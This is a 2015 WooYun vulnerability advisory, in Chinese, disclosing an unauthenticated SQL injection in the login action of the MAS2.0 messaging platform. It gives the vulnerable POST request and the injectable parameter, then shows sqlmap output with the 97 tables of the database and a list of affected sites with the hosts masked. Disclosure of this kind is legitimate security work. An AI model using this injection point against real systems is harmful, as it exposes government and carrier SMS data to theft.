当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134947

漏洞标题:无限立通MAS代理服务器通用型SQL注入漏洞(无需登录DBA权限)

相关厂商:北京无限立通通讯技术有限责任公司

漏洞作者: 路人甲

提交时间:2015-08-20 10:27

修复时间:2015-11-19 18:28

公开时间:2015-11-19 18:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-20: 细节已通知厂商并且等待厂商处理中
2015-08-21: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-24: 细节向第三方安全合作伙伴开放
2015-10-15: 细节向核心白帽子及相关领域专家公开
2015-10-25: 细节向普通白帽子公开
2015-11-04: 细节向实习白帽子公开
2015-11-19: 细节向公众公开

简要描述:

涉及众多政府,中国移动等。Y_Y

详细说明:

无限立通开发的“MAS2.0综合信息平台”存在无需登录情况下SQL注入漏洞。

POST /userLoginAction.action HTTP/1.1
Host: **.**.**.**
Content-Length: 69
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20120101 Firefox/33.0
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=663BFE493B61E5943595E0D931B0CC77
failReason=&user.sysUserName=admin&user.sysUserPassword=admin&x=0&y=0


参数user.sysUserName控制不严导致。

漏洞证明:

aaaaaaaaaaaa111111111111111111.jpg


aaaaaaaaaaaa222222222222222222222.jpg


aaaaaaaaaa3333333333333333.jpg


aaaaaaaaaa444444444444444.jpg


aaaaaaaaaaaa5555555555555555.jpg


Database: mas22
[97 tables]
+-------------------------------+
| local_db_ record_tb           |
| address_list_contact_group_tb |
| address_list_contact_tb       |
| address_list_group_tb         |
| address_list_info_tb          |
| alarm_tb                      |
| ap_notify_cmability_tb        |
| application_plug_catalog_tb   |
| application_plug_tb           |
| biz_config_tb                 |
| biz_performance_stat_tb       |
| business_capability           |
| cmability_tb                  |
| comm_sms                      |
| comm_sms_deliver              |
| comm_sms_sendtype             |
| comm_sms_type                 |
| communicate_capability        |
| data_backup_tb                |
| database_connection_tb        |
| delay_stat_tb                 |
| ec_tb                         |
| file_upload_tb                |
| ftpupload_config_tb           |
| info_check_tb                 |
| integrate_capability          |
| integrate_capability_desc     |
| keyword_filter_tb             |
| local_db_tb                   |
| mapping_filter_tb             |
| mapping_log                   |
| mapping_route_tb              |
| masbiz_announcement           |
| masbiz_blessing               |
| masbiz_calendar               |
| masbiz_meeting_notice         |
| masbiz_notepad                |
| material_group_tb             |
| material_tb                   |
| material_type_tb              |
| mms_attachment_tb             |
| mms_config_tb                 |
| mms_content_tb                |
| mms_deliver_content_tb        |
| mms_deliver_tb                |
| mms_depository_group_tb       |
| mms_depository_tb             |
| mms_frame_tb                  |
| mms_id_mapping                |
| mms_inbox                     |
| mms_outbox                    |
| mms_sent                      |
| mms_submit_content_tb         |
| mms_submit_tb                 |
| mms_transfer_tb               |
| msg_failedbox                 |
| msg_inbox                     |
| msg_outbox                    |
| msg_route_tb                  |
| msg_sentbox                   |
| pe_commnication_tb            |
| perm_resource_tb              |
| perm_role_tb                  |
| perm_user_role_tb             |
| perm_user_tb                  |
| plug_communication_tb         |
| role_resource_tb              |
| sms_config_tb                 |
| sms_deliver_history_tb        |
| sms_deliver_tb                |
| sms_filter_tb                 |
| sms_id_mapping                |
| sms_inbox                     |
| sms_mo_trigger_relation       |
| sms_mo_trigger_tb             |
| sms_outbox                    |
| sms_pflog                     |
| sms_sendtime_tb               |
| sms_sent                      |
| sms_statistics_detail         |
| sms_submit_history_tb         |
| sms_submit_tb                 |
| sms_traffic                   |
| smw_cmpp_deliver              |
| smw_cmpp_deliver_result       |
| smw_cmpp_query                |
| smw_cmpp_submit               |
| smw_cmpp_submit_result        |
| snmp_config_tb                |
| system_config_tb              |
| system_log_tb                 |
| upgrade_info                  |
| user_sms_count_tb             |
| wappush_outbox                |
| wappush_sent                  |
| wblist_tb                     |
| wbsynchro_config_tb           |
+-------------------------------+
[02:57:11] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'


案例:

**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**:8443/
**.**.**.**:8443/
**.**.**.**/
**.**.**.**:8443/
**.**.**.**:8443/
http://**.**.**.**/
**.**.**.**/
**.**.**.**:8443/
**.**.**.**/
**.**.**.**/
**.**.**.**:8443/
**.**.**.**:8081/

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-08-21 18:26

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国中国移动通信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无